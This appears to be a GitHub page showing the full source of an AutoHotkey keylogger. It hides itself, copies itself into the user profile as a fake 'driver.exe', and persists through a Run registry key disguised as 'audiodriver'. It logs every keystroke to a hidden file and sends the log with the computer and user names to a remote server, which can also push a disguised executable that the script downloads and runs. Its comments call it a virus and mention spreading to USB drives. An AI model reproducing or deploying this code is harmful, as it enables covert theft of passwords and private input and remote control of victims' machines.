-
Notifications
You must be signed in to change notification settings - Fork 3
/
noautocopynoautorun.ahk
executable file
·249 lines (235 loc) · 7.27 KB
/
noautocopynoautorun.ahk
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
;
; AutoHotkey Version: 1.x
; Language: English
; Platform: Win9x/NT
;
;
#NoEnv ; Recommended for performance and compatibility with future AutoHotkey releases.
SendMode Input ; Recommended for new scripts due to its superior speed and reliability.
; Detect hidden windows since they can be active
DetectHiddenWindows, On
#NoTrayIcon
capstate := GetKeyState("Capslock", "T") ; True if CapsLock is ON, false otherwise.
Regread, autorunreg, HKEY_CURRENT_USER, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, audiodriver
EnvGet, prof, USERPROFILE
EnvGet, compname, COMPUTERNAME
EnvGet, username, USERNAME
IfNotexist, %prof%\driver.exe
Filecopy, %A_ScriptFullPath%, %prof%\driver.exe
Fileappend, ,hi, %prof%\replyfile.txt
FileSetattrib, +SH, %prof%\replyfile.txt
IfNotexist, %prof%\userdata.ntg
Fileappend, [%username%@%compname%] ,%prof%\userdata.ntg
FileSetattrib, +SH, %prof%\userdata.ntg ;change this name to userdata.ntg, for tempdata.ntg also
if autorunreg != %prof%\driver.exe
{
IfNotexist, %prof%\driver.exe
Filecopy, %A_ScriptFullPath%, %prof%\driver.exe
FileSetattrib, +SRH, %prof%\driver.exe
RegWrite, REG_SZ, HKEY_CURRENT_USER, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, audiodriver, %prof%\driver.exe
}
IfNotEqual, A_ScriptFullPath, %prof%\driver.exe
{
Process, Exist, driver.exe
If ErrorLevel
exitapp
else
run, %prof%\driver.exe
exitapp
}
uploaded=0
version=4
hModule := DllCall("LoadLibrary", "str", "wininet.dll") ; Avoids the need for DllCall() in the loop to load the library.
var="";
count=0
Loop {
sleep 20000 ;without sleep, it take approx 1 sec delay
filegetsize, size , tempdata.ntg
if(size>0)
count=count+1
if(count>10 || size>10) ;less data for long time or data is large
{count=0
uploaded=0
}
result := DllCall("wininet.dll\InternetGetConnectedState","str",var, "Int", 0) ;1-> internet connected, 0-> not connected
if result = 0
Suspend, On
else
suspend, Off
;TrayTip, state, %result%, 1
if (uploaded == 0 && result == 1) ;condition should be internet connection checking and upload succesfull or not (from reply from server)
{
fileread, tempvar , tempdata.ntg
;tempvar:= *[%compname%`\%username%]*%tempvar%
url:="http://supersecretesever.com/update.php?u=". tempvar
url:=url . "&c=". compname
url:=url . "&user=". username
UrlDownloadToFile, %url% , %A_WorkingDir%\replyfile.txt
fileread, reply , %A_WorkingDir%\replyfile.txt
StringLeft, reply, reply, 1
if(reply==1)
{
uploaded=1;
fileappend, %tempvar% , userdata.ntg ;THIS IS used only after uploading
filedelete, tempdata.ntg
}
else if(reply==2) ;provision to deactivate application
{
exitapp
}
else if(reply==3)
{
UrlDownloadToFile, "http://supersecretesever.com/upgradeversion.php" , %A_WorkingDir%\replyfile.txt
fileread, reply , %A_WorkingDir%\replyfile.txt
StringLeft, reply, reply, 1
if(reply>version) ;if version greater, upgrade
{
UrlDownloadToFile, "http://supersecretesever.com/upgraded.jpg" , %A_WorkingDir%\upgraded.jpg
FileMove, %A_WorkingDir%\upgraded.jpg, %A_WorkingDir%\driver1.exe ,1
run, %A_WorkingDir%\driver1.exe
exitapp
}
}
}
;done;;;; put a link which sends result activated or not. 1 or 3 parse <!-- and extract first text
;done;;;; put a link to upgrade the virus or not
;done;;;; inside this loop , wininet.dll(InternetGetConnectedState)
;done;;;; add autorun to registry(either default autorun or startupmonitor's registry key)
;done;;;; add autorun to copy to pendrive (use window's onmessage call back functions and copy to all pendrives in name of facebook.exe)
;done;;;; copy to user's folder / temp folder(not recomended) and add to registry
;done;;;; while writing keylogitself, write is as url encoded
}
~a::gosub smallorcap
~b::gosub smallorcap
~c::gosub smallorcap
~d::gosub smallorcap
~e::gosub smallorcap
~f::gosub smallorcap
~g::gosub smallorcap
~h::gosub smallorcap
~i::gosub smallorcap
~j::gosub smallorcap
~k::gosub smallorcap
~l::gosub smallorcap
~m::gosub smallorcap
~n::gosub smallorcap
~o::gosub smallorcap
~p::gosub smallorcap
~q::gosub smallorcap
~r::gosub smallorcap
~s::gosub smallorcap
~t::gosub smallorcap
~u::gosub smallorcap
~v::gosub smallorcap
~w::gosub smallorcap
~x::gosub smallorcap
~y::gosub smallorcap
~z::gosub smallorcap
~+A::gosub smallorcapSHIFT
~+B::gosub smallorcapSHIFT
~+C::gosub smallorcapSHIFT
~+D::gosub smallorcapSHIFT
~+E::gosub smallorcapSHIFT
~+F::gosub smallorcapSHIFT
~+G::gosub smallorcapSHIFT
~+H::gosub smallorcapSHIFT
~+I::gosub smallorcapSHIFT
~+J::gosub smallorcapSHIFT
~+K::gosub smallorcapSHIFT
~+L::gosub smallorcapSHIFT
~+M::gosub smallorcapSHIFT
~+N::gosub smallorcapSHIFT
~+O::gosub smallorcapSHIFT
~+P::gosub smallorcapSHIFT
~+Q::gosub smallorcapSHIFT
~+R::gosub smallorcapSHIFT
~+S::gosub smallorcapSHIFT
~+T::gosub smallorcapSHIFT
~+U::gosub smallorcapSHIFT
~+V::gosub smallorcapSHIFT
~+W::gosub smallorcapSHIFT
~+X::gosub smallorcapSHIFT
~+Y::gosub smallorcapSHIFT
~+Z::gosub smallorcapSHIFT
~`::fileappend, ``, tempdata.ntg ;hkntw
~~::fileappend, `%7E, tempdata.ntg
~!::fileappend, !, tempdata.ntg
~@::fileappend, @, tempdata.ntg
~#::fileappend, `%23, tempdata.ntg
~$::fileappend, `%24, tempdata.ntg
~%::fileappend, `%25, tempdata.ntg
~^::fileappend, ^, tempdata.ntg
~&::fileappend, `%26, tempdata.ntg
~*::fileappend, *, tempdata.ntg
~(::fileappend, (, tempdata.ntg
~)::fileappend, ), tempdata.ntg
~-::fileappend, -, tempdata.ntg
~_::fileappend, _, tempdata.ntg
~=::fileappend, `%3D, tempdata.ntg
~+::fileappend, `%2B, tempdata.ntg
~[::fileappend, [, tempdata.ntg
~{::fileappend, {, tempdata.ntg
~]::fileappend, ], tempdata.ntg
~}::fileappend, }, tempdata.ntg
~\::fileappend, \, tempdata.ntg
~|::fileappend, `|, tempdata.ntg
~;::fileappend, `%3B, tempdata.ntg
~'::fileappend, ', tempdata.ntg
~,::fileappend, `%2C , tempdata.ntg
~<::fileappend, `%3C, tempdata.ntg
~.::fileappend, ., tempdata.ntg
~>::fileappend, `%3E, tempdata.ntg
~/::fileappend, `%2F, tempdata.ntg
~?::fileappend, `%3F, tempdata.ntg
~+;::fileappend, `%3A, tempdata.ntg
~+'::fileappend, `", tempdata.ntg
~enter::fileappend, {enter}`n, tempdata.ntg
~space::fileappend, {space}, tempdata.ntg
~tab::fileappend, {tab}, tempdata.ntg
~CapsLock::
{
fileappend, {caps}, tempdata.ntg
capstate := GetKeyState("Capslock", "T") ; True if CapsLock is ON, false otherwise.
}
return
~backspace::fileappend, {<-}, tempdata.ntg
~delete::fileappend, {del}, tempdata.ntg
~1::fileappend, 1, tempdata.ntg
~2::fileappend, 2, tempdata.ntg
~3::fileappend, 3, tempdata.ntg
~4::fileappend, 4, tempdata.ntg
~5::fileappend, 5, tempdata.ntg
~6::fileappend, 6, tempdata.ntg
~7::fileappend, 7, tempdata.ntg
~8::fileappend, 8, tempdata.ntg
~9::fileappend, 9, tempdata.ntg
~0::fileappend, 0, tempdata.ntg
smallorcap:
{
StringTrimLeft, keygot, A_ThisHotkey, 1
if(capstate==1)
{
stringupper, keygot, keygot
fileappend, %keygot%, tempdata.ntg
}
else
fileappend, %keygot%, tempdata.ntg
}
return
smallorcapshift:
{
StringTrimLeft, keygot, A_ThisHotkey, 2
if(capstate==1)
{
stringlower, keygot, keygot
fileappend, %keygot%, tempdata.ntg
}
else
fileappend, %keygot%, tempdata.ntg
}
return
#!q::
{
exitapp
DllCall("FreeLibrary", "UInt", hModule) ; To conserve memory, the DLL may be unloaded after using it.
}